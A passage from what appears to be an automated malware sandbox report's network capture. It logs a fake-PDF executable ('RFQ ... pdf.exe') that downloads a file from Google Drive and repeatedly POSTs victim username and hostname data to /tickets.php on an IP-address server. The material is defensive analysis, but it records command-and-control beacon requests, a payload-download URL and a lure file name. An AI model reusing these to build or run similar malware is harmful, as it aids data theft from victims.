                            Dec 1, 2021 11:57:39.009844065 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.009938002 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.009953976 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.010021925 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.022819996 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.023207903 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.023225069 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.023413897 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.023516893 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.023530960 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.023593903 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.024816036 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.025558949 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.025573969 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.026299000 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.026377916 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.026391983 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.027838945 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.027924061 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.027940989 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.029171944 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.029278994 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.029387951 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.029401064 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.029591084 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.030814886 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.032310963 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.032392979 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.032392979 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.032418966 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.032474041 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.033771992 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.035554886 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.035638094 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.035644054 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.035666943 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.035726070 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.036562920 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.037755966 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.037771940 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.037883043 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.037899971 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.037986040 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.038022995 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.038038015 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.038073063 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.038130999 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.039472103 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.039563894 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.039580107 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.040833950 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.040929079 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.040944099 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.041966915 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.041966915 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.041991949 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.042054892 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.042092085 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.042959929 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.044352055 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.044430971 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.044459105 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.044480085 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.044507027 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.044544935 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.045804977 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.046289921 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.046307087 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.046396017 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.046838999 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.047276974 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.047355890 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.047370911 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.047391891 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.047430038 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.047476053 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.048007965 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.049197912 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.049299002 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.049309015 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.049326897 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.049365044 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.049395084 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.049848080 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.050525904 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.050606012 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.050626040 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.050643921 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.050688028 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.050724030 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.050734043 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.050817013 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.051476002 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.052930117 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.053006887 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.053035021 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.053051949 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.053091049 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.053164959 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.053270102 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.053608894 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.053637028 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.054141045 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.054245949 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.054266930 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.054827929 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.054847956 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.054986000 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.055001974 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.055164099 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.056226015 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.056298971 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.056318045 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.056596994 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.056895018 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.056981087 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.056998014 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.057332993 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.057405949 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.057429075 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.058238983 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.058259964 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.059417963 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.059495926 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.059509993 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.059531927 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.059582949 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.060086012 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.060220957 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.060291052 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.060313940 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.060336113 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.060405970 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.063785076 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.063815117 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:40.517846107 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:40.683846951 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:40.683958054 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:40.688250065 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:40.853789091 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:40.853878021 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:41.018997908 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:41.628361940 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:41.628397942 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:41.628498077 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:41.629040956 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:41.793761015 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:47.825213909 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:47.990793943 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:47.992289066 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:47.999522924 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:48.164722919 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:48.165203094 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:48.336815119 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:49.049098969 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:49.049149036 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:49.049231052 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:49.049957991 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:49.215148926 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:52.478847027 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:52.647747040 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:52.647856951 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:52.652789116 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:52.821069002 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:52.821244955 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:52.991245985 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:53.605789900 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:53.605823040 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:53.605910063 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:53.606673002 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:53.774986029 CET804982563.250.34.171192.168.2.4

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 1, 2021 11:57:37.730926991 CET5662753192.168.2.48.8.8.8
                            Dec 1, 2021 11:57:37.750525951 CET53566278.8.8.8192.168.2.4
                            Dec 1, 2021 11:57:38.664941072 CET6311653192.168.2.48.8.8.8
                            Dec 1, 2021 11:57:38.704154968 CET53631168.8.8.8192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Dec 1, 2021 11:57:37.730926991 CET192.168.2.48.8.8.80x81cStandard query (0)drive.google.comA (IP address)IN (0x0001)
                            Dec 1, 2021 11:57:38.664941072 CET192.168.2.48.8.8.80xfb9cStandard query (0)doc-00-50-docs.googleusercontent.comA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Dec 1, 2021 11:57:37.750525951 CET8.8.8.8192.168.2.40x81cNo error (0)drive.google.com142.250.180.110A (IP address)IN (0x0001)
                            Dec 1, 2021 11:57:38.704154968 CET8.8.8.8192.168.2.40xfb9cNo error (0)doc-00-50-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                            Dec 1, 2021 11:57:38.704154968 CET8.8.8.8192.168.2.40xfb9cNo error (0)googlehosted.l.googleusercontent.com216.58.198.33A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • drive.google.com
                            • doc-00-50-docs.googleusercontent.com
                            • 63.250.34.171

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.449792142.250.180.110443C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.449796216.58.198.33443C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.44980563.250.34.17180C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            TimestampkBytes transferredDirectionData
                            Dec 1, 2021 11:57:40.688250065 CET2197OUTPOST /tickets.php?id=277 HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.250.34.171
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: AA495C78
                            Content-Length: 190
                            Connection: close
                            Dec 1, 2021 11:57:40.853878021 CET2200OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                            Data Ascii: 'ckav.rujones936905DESKTOP-716T771k08F9C4E9C79A3B52B3F739430SDERE
                            Dec 1, 2021 11:57:41.628361940 CET5958INHTTP/1.1 403 Forbidden
                            Date: Wed, 01 Dec 2021 10:57:40 GMT
                            Server: Apache/2.4.38 (Debian)
                            Content-Length: 287
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.44982463.250.34.17180C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            TimestampkBytes transferredDirectionData
                            Dec 1, 2021 11:57:47.999522924 CET9681OUTPOST /tickets.php?id=277 HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.250.34.171
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: AA495C78
                            Content-Length: 190
                            Connection: close
                            Dec 1, 2021 11:57:48.165203094 CET9681OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                            Data Ascii: 'ckav.rujones936905DESKTOP-716T771+08F9C4E9C79A3B52B3F739430Hy9bt
                            Dec 1, 2021 11:57:49.049098969 CET9682INHTTP/1.1 403 Forbidden
                            Date: Wed, 01 Dec 2021 10:57:48 GMT
                            Server: Apache/2.4.38 (Debian)
                            Content-Length: 287
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.44982563.250.34.17180C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            TimestampkBytes transferredDirectionData
                            Dec 1, 2021 11:57:52.652789116 CET9682OUTPOST /tickets.php?id=277 HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.250.34.171
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: AA495C78
                            Content-Length: 163
                            Connection: close
                            Dec 1, 2021 11:57:52.821244955 CET9683OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                            Data Ascii: (ckav.rujones936905DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Dec 1, 2021 11:57:53.605789900 CET9685INHTTP/1.1 403 Forbidden
                            Date: Wed, 01 Dec 2021 10:57:52 GMT
                            Server: Apache/2.4.38 (Debian)
                            Content-Length: 287
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.449792142.250.180.110443C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-01 10:57:38 UTC0OUTGET /uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Host: drive.google.com
                            Cache-Control: no-cache
                            Cookie: CONSENT=YES+GB.en-GB+V9+BX
                            2021-12-01 10:57:38 UTC0INHTTP/1.1 302 Moved Temporarily
                            Content-Type: text/html; charset=UTF-8
                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                            Pragma: no-cache
                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                            Date: Wed, 01 Dec 2021 10:57:38 GMT
                            Location: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download
                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                            Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                            Content-Security-Policy: script-src 'nonce-c98Ige+CGajsmFHH8IHEQA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                            X-Content-Type-Options: nosniff
                            X-Frame-Options: SAMEORIGIN
                            X-XSS-Protection: 1; mode=block
                            Server: GSE
                            Set-Cookie: NID=511=RbH0ThAklRT-V2MEDXdyF7kXvVDjQs949XeFpwPKVsLL8jbEODyPuUS-e6qhb9kmhK5pUgxxD2bnncofWLeCSJkuRhKqpxTI72tVlkiH8iI0_AVtWqm6u-DqU5OVkuoXhiiQ_9HhwzUWa2mEKwwz7cfi0P4SihoXqPcEcZMZ1K4; expires=Thu, 02-Jun-2022 10:57:38 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                            Accept-Ranges: none
                            Vary: Accept-Encoding
                            Connection: close
                            Transfer-Encoding: chunked
                            2021-12-01 10:57:38 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 30 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 74 6d 67 6b
                            Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgk
                            2021-12-01 10:57:38 UTC2INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.449796216.58.198.33443C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            TimestampkBytes transferredDirectionData
